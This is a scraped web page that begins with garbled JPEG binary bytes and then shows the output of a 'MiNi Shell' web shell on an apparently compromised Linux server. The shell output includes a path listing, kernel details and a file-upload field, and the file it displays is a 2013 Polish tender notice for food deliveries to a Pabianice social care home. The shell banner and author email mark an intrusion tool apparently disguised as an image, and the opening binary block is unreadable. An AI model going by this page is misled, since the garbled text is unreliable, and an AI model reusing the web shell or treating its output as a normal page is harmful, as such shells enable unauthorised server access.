JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131114/464532-N-2013.html

<p class="kh_header"><b>Pabianice: Dostawę  artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach w terminie
od 02.01.2014r do 31.12.2014r</b><br>
<b>Numer ogłoszenia: 464532 - 2013; data zamieszczenia: 14.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Pabianicach , ul. Wiejska 55/61, 95-200 Pabianice, woj. łódzkie, tel. 042 2137551, faks 042 2137640.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pabianice-dps.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę  artykułów spożywczych dla Domu Pomocy Społecznej w Pabianicach w terminie
od 02.01.2014r do 31.12.2014r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Artykuły spożywcze konfekcjonowane


1.	Barszcz czerwony koncentrat 		min   320g
max 500g	kg	59
2.	Chrzan z kwaskiem cytrynowym skład: korzeń chrzanu  nie mniej niż 52% , woda, cukier, olej roślinny		min  300g
max 450g	kg	36
3.	Ćwikła z chrzanem, skład: buraczki ćwikłowe nie mniej niż 61% ,świeży korzeń chrzanu nie mniej niż 19%		min 350g
max 450g	kg	35

4.
	Dżem wiśniowy, (zawartość owoców  nie mniej niż 35g na 100g produktu lub proporcjonalnie)		min 280g
max 450g	kg	272

5.
	Dżem truskawkowy, (zawartość owoców nie mniej niż  40g na 100g produktu lub proporcjonalnie)		min  280g
max 450g	kg	140
6.	Fasola Jaś paczkowana ,ziarno wielkości od 18-25mm, białe bez przebarwień		min 400g
max 5kg	       kg	100
7.	Fasola konserwowa, (po odcieku nie mniej niż  280g lub proporcjonalnie)		min 460g
max 620g	kg	87
8.	Groszek konserwowy,( ze świeżego ziarna, po odcieku nie mnij niż 120g lub proporcjonalnie)		min 200g
max 400 g	kg	312
9.	Groch suchy łupany paczkowany		min 400g
max 5 kg	kg	50
10.	Koncentrat pomidorowy nie mniej niż 30% ze świeżych pomidorów typu Włocławek lub równoważny		min 970g
max 1000g	kg	378
11.	Koncentrat pomidorowy nie mniej niż 30%  ze świeżych pomidorów typu Włocławek lub równoważny		min 200g
max 300g	kg	40
12.	Kompot wiśniowy na cukrze (zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75/A-75953
		min 900g
max 1000g	kg	1350
13.	Kompot  truskawkowy na cukrze(zawartość owoców nie mniej niż 430g lub proporcjonalnie) PN-75/A-75953		min 900g
max 1000g	kg	540
14.	Ogórki konserwowe (po odcieku nie mniej niż 490g lub proporcjonalnie) PN-75/A-75953
		    min 900g
   max  1500g	kg	1035
15.	Kukurydza konserwowa (po odcieku nie mniej niż 220g lub proporcjonalnie)		min 400g
max 440g	kg	172
16.	Szczaw konserwowy  		min 320g
max 900g	kg	77
17.	Syrop owocowy typu  Paola lub równoważny (zagęszczony wysokosłodzony, pasteryzowany zawierający  syrop glukozowo-fruktozowy, cukier)		min 430ml
max 1000ml	l	       65
18.	Cukier paczkowany		min1kg
max 3kg	kg	6000
 19.	Cukier puder		min 400g
max 1kg	kg	52
 20.	Cukier wanilinowy 		min  32g
max 64g	kg	33
21.	Sól spożywcza, paczkowana, warzona, jodowana		min 1kg
max 5kg	kg	900
22.	Herbatka owocowa expresowa 
w torebkach 		min 30g
max 50g 	kg	53
23.	Herbata granulowana czarna, kraj pochodzenia Indie grube granulki bez zanieczyszczeń		min 100g
max 200g	kg	200
24.	Kawa Inka		min 150g
max 300g	kg	27
25.	Kakao ciemne(zawartość tłuszczu nie mniej niż 10-12% )		min 100g
max 200g	kg	40
26.	Liść laurowy		min 8g
max 50g	kg	2,40
27.	Majeranek		min 20g
max 50g	kg	6
28.	Pieprz mielony(zawartość pieprzu 100%)		min 20g
max 50g	kg	16
29.	Żelatyna 		min 50g
max 200g	kg	5
30.	Cynamon		min 20g
max 50g	kg	5,6
31.	Przyprawa typu Warzywko (zawartość suszonych warzyw nie mniej niż 15,1% zawierająca  pomidory)		min 75g
max 200g	kg	15
32	Przyprawa typu Vegeta(zawartość suszonych warzyw nie mniej niż 15,5%)		min 75g
max 200g	kg	15
33.	Przyprawa typu Degusta (zawartość warzyw nie mniej niż 14%)		min 75g
max 200g	kg	15
34.	Proszek do pieczenia		min 36g
max 50g	kg	32,40
35.	Papryka konserwowa (po odcieku nie mniej niż 320g lub proporcjonalnie)		min 670g
max 900g	kg	402
36.	Zupa pieczarkowa w proszku		min 60g
max 100g	kg	       60
37.	Zupa grochowa w proszku		min 45g
max 100g	kg	6,75
38.	Aromat		min 10g
max 20g	kg	5
39.	Budyń śmietankowy, waniliowy, malinowy, czekoladowy		min 41g
max 50g	kg	390
40.	Kisiel wiśniowy, truskawkowy, cytrynowy, żurawinowy		min 40g
max 50g	kg	208
41.	Słodzik 100 tabletek		min 4g
max 5g	kg	2,00
42.	Rosołki drobiowe, wołowe		min 60g
max 100g	kg	52,80
43.	Ocet		min 500ml
max 1l	l	20
44.	Przyprawa do zup w płynie		min 1kg
max 1,50lkg	kg	100
45.	Musztarda delikatesowa		min190g
max 250g	kg	180,50
46.	Kwasek cytrynowy		min 20g
max 50g	kg	16,80
47.	Majonez skład: olej roślinny, żółtko jaj nie mniej niż 6%, ocet, musztarda, kwas cytrynowy		min 400ml
max 620ml	l	240
48.	Ziele angielskie		min 15g
max 50g	kg	4,50
49.	Makaron z mąki makaronowej		       min 500g
       max 1000g	kg	1800

50.	Makaron z semoliny 100% typu Lubella lub równoważny		min 500g
max 1000g	kg	20
51.	Papryka słodka w proszku		min 20g
max 50g	kg	1,00
52.	Ketchup  typu Włocławek lub równoważny (skład:100g produktu uzyskane z co najmniej 163g pomidorów lub proporcjonalnie)
		min 480g
max 500g	kg	153,60
53.
	Ryż paczkowany, długoziarnisty, gat. I 		min 1kg
max 3 kg	kg	940
54.
	Mąka ziemniaczana paczkowana		min 500g
max 1 kg	kg	330
55.
	Mąka pszenna paczkowana typ 480		min 1kg
max 3 kg	kg	3930
56.	Kasza gryczana palona paczkowana gat. I		min 500g
max 5kg	kg	250
57.	Kaszka ml-ryżowa, na mleko nie mniej niż 38% mleko modyfikowane, nie mniej niż 32% odtłuszczone mleko w proszku 		min 230g
max 500g	kg	4,60
58.	Kasza manna paczkowana		min 1kg
max 3kg	kg	320
59.	Kasza jęczmienna średnia paczkowana		min 1kg
max 3 kg	kg	120
60.	Płatki owsiane górskie paczkowane (do zalewania wrzątkiem)		 min 500g
max 1 kg	kg	160
61.
	Olej rzepakowy 		min 1l
max 3l	l	740
62.
	Olej rzepakowy 		
 0,50 l	l	130
63.	Miód wielokwiatowy typu Tymbark lub równoważny ,kubek plastikowy (nie torebka)		min 25g
max 30g	kg	206,25
64.	Kleik ryżowy na mleko (skład: mąka ryżowa 100%, witamina B1)		min 170g
max 500g	kg	6,80
65.	Suchary delikatesowe		min 290g
max 500g	kg	11,60
66.	Listki waflowe bez cukru dla diabetyków		min 32g
max 100g	kg	6,50

67.	
Wafelki bez cukru dla diabetyków		min 40g
max 100g	kg	41,20
68.	Herbatniki lekkie bez cukru dla diabetyków		min 73g
max 100g	kg	80,30
69.	Biszkopty paczkowane		min 250g
max 500g	kg	200
70.	Smalec paczkowany		min 200g
max 500g	kg	100
71.	Grzyby suszone podgrzybki,     nie krojone 		min 500g
max 1kg	kg	3
72.	Jabłka suszone		min 500g
max 2kg	kg	12
73.	Śliwki bez pestek suszone		min 500g
max 2kg	kg	12
74.	Galaretka truskawkowa		min 70g
max 100g	kg	65,25
75.	Dżem bez cukru: czarna porzeczka, wiśnia ,truskawka, brzoskwinia, malina, zawartość owoców  nie mniej niż 50%, fruktoza nie mniej niż 28% 		min 190g
max 250g	kg	456
76.	Czosnek suszony		min 20g
max 50g	kg	1
77.	Margaryna zwykła kostka		min 250g
max 500g	kg	750

B. Ryby i przetwory rybne
1.	Filet z ryb mrożonych panga 		---	kg	700
2.	Filet z ryb mrożonych mintaj ( nie z dostaw chińskich)		---	kg	100
3.	Filet z ryb mrożonych morszczuk ( nie z dostaw chińskich)		---	kg	100
4.	Śledzie płaty 		---	kg	100
5.	Makrela wędzona		---	kg	150

C.        Artykuły mleczarskie

1.	Mleko  pasteryzowane, homogenizowane, (zawartość tłuszczu 2%, folia) 		min 3 l
max 5 l	l	22 000
2.	Masło Extra, 
(zawartość tłuszczu nie mniej niż 82% , paczkowane)		min 200g
max 250g	kg	3 300
3.	Serek homogenizowany (smak waniliowy, truskawkowy, malinowy)		min 150g
max 170g	kg	150
 4.	Ser biały, twarogowy, półtłusty, paczkowany, terminizowany		min 250g
max 1kg	kg	1600
 5.	Serek typu kanapkowy lub równoważny, 
(serek twarogowy, kremowy, naturalny, terminizowany, zawartość tłuszczu nie mniej niż 12%)		min 100g
max 140g	kg	168
 6.	Serek topiony kremowy (terminizowany, zawartość tłuszczu nie mniej niż 27%)		min 50g
max 100g	     kg	760
7.	Ser żółty pełnotłusty  typu Gouda lub równoważny
( zawartość tłuszczu nie mniej niż 26% )		---	kg	300
8.	Śmietana homogenizowana, (zawartość tłuszczu 18%)		min 200g
max 400g	kg	320
9.	Jogurt naturalny (zawartość tłuszczu nie mniej niż 2%)		min 150g
max 500g	kg	280
10.	Jogurt owocowy z kawałkami owoców,
(skład: nie mniej niż 9% owoców, sok z owoców, cukier, mleko w proszku odtłuszczone)		min 125g
max 170g	kg	442

D.             Pieczywo

1.	Chleb pszenny, krojony, paczkowany		min 600g
max 1kg	kg	16 100

2.	Chleb razowy, krojony, paczkowany		min 400g
max 600g	kg	425

3.	
Bułka pszenna		min 40g
max 60g	kg	2050
 
 4.
	Bułka tarta, paczkowana		min 500g
max 1kg	kg	225

5.
	Drożdże		min 250g
max 1kg	kg	100
6.
	Żurek		min 1l
max 5 l	     l	500

7.
 	Rogal maślany		min 80g
max 100g	kg	550

8.
 	Angielka krojona, paczkowana		min 300g
max 500g	kg	3000

9.
	Chałka		min   300g
max  500g	kg	250

E.         Warzywa
 1.	Buraki		---	kg	2500
 2.	Botwina		       ---	pęczki	  370
 3.	Brukselka		---	kg	  440
  4.	Brokuły		---	szt	  160
  5.	Cebula		---	kg	   1100
  6.	Czosnek		---	szt	    80
7.	Fasolka szparagowa		---	kg	  100
8.	Kalafior		---	szt	  900
9.	Koperek		---	kg	  150
10.	Kapusta biała		---	szt	2000
11.	Kapusta czerwona		---	kg	  220
12.	Kapusta pekińska		---	kg	  170
13.	Marchew		---	kg	   6000
14.	Ogórek zielony		---	kg	  900
15.	Pietruszka		---	kg	   1300
16.	Nać pietruszki		---	kg	  150
17.	Por		---	kg	  170
18.	Pomidory		---	kg	   3300
19.	Pieczarki		---	kg	  230
20.	Papryka czerwona		---	Kg	    50
21.	Papryka żółta		        ---	kg	    50
  22.	Rzodkiewka		---	pęczki	  450
  23.	Sałata		---	szt	   5500
  24.	Seler		---	kg	   1000
  25.	Szczypiorek		---	pęczki	  500

F. Ziemniaki


1.	Ziemniaki jadalne, klasa I
(pakowane w workach)		min 10 kg
max 25 kg	kg	37 000

G. Jabłka

1.	Jabłka klasa I
( pakowane w skrzynki plastikowe lub drewniane)		min 10 kg
max 20 kg	kg	4000

H. Kapusta kiszona i ogórki kiszone

1.	Kapusta kiszona		---	kg	1 500
2.	Ogórek kiszony		---	kg	1 500

I.          Jajka
1.	Jajka kurze świeże, 
klasa L		---	szt	56 000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.85.00.00-1, 15.80.00.00-6, 15.22.00.00-6, 15.20.00.00-0, 15.51.00.00-6, 15.54.00.00-5, 15.81.00.00-9, 03.22.00.00-9, 03.21.21.00-1, 03.22.00.00-9, 15.33.00.00-0, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczeń
stanowiących załącznik nr 2 oraz załącznik nr 5 do specyfikacji i załączenie ich do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia tego warunku będzie podpisanie oświadczenia 
stanowiącego załącznik nr 2 do specyfikacji i załączenie go do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość zmiany cen w przypadku dostaw warzyw, ziemniaków,    
      jabłek, kapusty i ogórków kiszonych (załączniki nr 4 E, F, G, H). Wzrost cen   
      zaproponowany przez Wykonawcę nie może przewyższać wysokości cen obowiązujących 
      w danym okresie na targowisku (Zjazdowa) w Łodzi, publikowanym na stronie 
      internetowej www.zjazdowa.com.pl . W pozostałych asortymentach ceny pozostają stałe 
      w ciągu całego roku, z wyjątkiem ustawowej  zmiany stawki podatku 
      VAT, wprowadzonych na podstawie przepisów prawa, przy czym zmianie ulegnie 
      wyłącznie cena brutto danego towaru. W takim przypadku wynagrodzenie należne 
      Wykonawcy podlega automatycznej waloryzacji, bez konieczności zmiany umowy, 
      odpowiednio o kwotę podatku VAT wynikającą ze stawki tego podatku obowiązującą w      
      chwili powstania obowiązku podatkowego. Wykonawca  poinformuje Zamawiającego o 
      ich wystąpieniu na piśmie, przed wprowadzeniem nowych cen.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pabianice-dps.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Pabianicach 95-200 Pabianice ul. Wiejska 55/61.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2013 godzina 09:00, miejsce: Dom Pomocy Społecznej w Pabianicach 95-200 Pabianice ul. Wiejska 55/61 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com